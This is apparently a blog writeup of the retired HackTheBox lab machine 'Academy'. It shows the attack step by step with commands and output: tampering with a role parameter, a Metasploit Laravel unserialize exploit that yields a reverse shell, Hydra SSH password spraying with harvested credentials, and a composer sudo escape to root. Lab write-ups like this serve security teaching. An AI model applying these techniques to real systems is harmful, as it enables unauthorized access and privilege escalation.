HTB: Academy

Posted on 28 Feb 2021 in security • 5 min read

Academy card

This is a writeup about a retired HacktheBox machine: Academy created by egre55 and mrb3n and publish on November 7, 2020. This box is classified as an easy machine. The user part involve a public exploit and some enumeration. The root part implies enumeration and a sudo binary.



We start with an nmap scan. Only ports 22 (SSH), 80 (HTTP) and 33060 (MYSQL) are open.

# Nmap 7.91 scan initiated Wed Nov  11 03:19:47 2020 as: nmap -p- -oN nmap
Nmap scan report for
Host is up (0.012s latency).
Not shown: 65532 closed ports
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

# Nmap done at Wed Nov  11 03:19:55 2020 -- 1 IP address (1 host up) scanned in 8.25 seconds


The website is a new HTB feature (as was swagshop) Academy. We can register an account but most of the functionalities are not working.

Academy homepage

We run a dirb on the website that allow use to find the admin.php endpoint.

$ dirb http://academy.htb/

DIRB v2.22
By The Dark Raver

START_TIME: Wed Nov  11 03:24:21 2020
URL_BASE: http://academy.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



---- Scanning URL: http://academy.htb/ ----
+ http://academy.htb/admin.php (CODE:200|SIZE:2633)
==> DIRECTORY: http://academy.htb/images/
+ http://academy.htb/index.php (CODE:200|SIZE:2117)
+ http://academy.htb/server-status (CODE:403|SIZE:276)


When taking a closer look at the registration request, we can see that there is a post parameter roleid set to 0.

POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://academy.htb
Connection: close
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=pf1cigmrl6la8c0o7lte5jubum
Upgrade-Insecure-Requests: 1


Using Burp and the proxy module, we change the roleid parameter to 1. Our new account can now log into the admin part. Which is mostly a todo list, disclosing the staging environment virtual host.

Academy Launch Planner


We update our /etc/hosts and browse to the staging environment.

Academy staging environment

We see in the disclosed path that the staging environment use the laravel framework which as a few public exploit one of them allowing for remote command execution.

kali@kali:~$ searchsploit laravel
-------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
Laravel - 'Hash::make()' Password Truncation Security                     | multiple/remote/39318.txt
Laravel Log Viewer < 0.13.0 - Local File Download                         | php/webapps/
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote  | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read                 | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload        | php/webapps/
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The unserialization exploit is a metasploit one. So we fire up msf, load the exploit and configure the options to use the API key (disclosed on the debug page) and our virtual host. Then we run the exploit and get a shell as www-data.

msf5 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

  Name       Current Setting                               Required  Description
  ----       ---------------                               --------  -----------
  APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
  Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                                            yes       The target port (TCP)
  SSL        false                                         no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                                             yes       Path to target webapp
  VHOST                    no        HTTP server virtual host

msf5 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on
[*] Command shell session 3 opened ( -> at 2020-11-11 04:11:10 -0500

uid=33(www-data) gid=33(www-data) groups=33(www-data)


We start enumerating and found a few credentials sets for the database. We also extract the users list from /etc/passwd and run the retrieved creds against the SSH service using hydra. The password stored in acedemy/.env allow us to connect as cry0l1t3 using SSH and grab the user flag.

cat ls ../../academy/.env




$ hydra  -L users -p 'mySup3rP4s5w0rd!!' ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak

Hydra ( starting at 2020-11-11 08:34:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 15 tasks per 1 server, overall 15 tasks, 15 login tries (l:15/p:1), ~1 try per task
[DATA] attacking ssh://
[22][ssh] host:   login: cry0l1t3   password: mySup3rP4s5w0rd!!
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-11-11 08:34:09

$ ssh -l cry0l1t3
cry0l1t3@'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)

* Documentation:
* Management:
* Support:

  System information as of Wed 11 Nov 2020 01:53:21 PM UTC

  System load:             0.0
  Usage of /:              44.5% of 15.68GB
  Memory usage:            18%
  Swap usage:              0%
  Processes:               171
  Users logged in:         0
  IPv4 address for ens160:
  IPv6 address for ens160: dead:beef::250:56ff:feb9:a424

0 updates can be installed immediately.
0 of these updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

Last login: Wed Nov  11 13:35:52 2020 from
$ cat user.txt


lateral movement

Our user is in the adm group. We can run bash to have a better shell.

$ id uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

According to GNU/Linux documentation this group has access to /var/log/ but there is nothing of interest there. We also have access to the aureport command and list the tty access containing mrb3n password.

cry0l1t3@academy:/var/log$ aureport --tty

TTY Report
# date time event auid term sess comm data
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>


We switch user su to our new mrb3n user and list our sudo persmission. We have sudo access to composer.

cry0l1t3@academy:/var/log$ su mrb3n
$ bash
mrb3n@academy:/home$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
mrb3n@academy:/home$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Using gtfobins we quickly obtain a root shell and the root flag.

mrb3n@academy:/home$ TF=$(mktemp -d)
mrb3n@academy:/home$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/home$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library '' (tried: /usr/lib/php/20190902/ (/usr/lib/php/20190902/ undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/ (/usr/lib/php/20190902/ cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library '' (tried: /usr/lib/php/20190902/ (/usr/lib/php/20190902/ undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/ (/usr/lib/php/20190902/ cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt

Wrapping up

An easy machine mostly based on public exploit and enumeration. I will recommand it to begginers.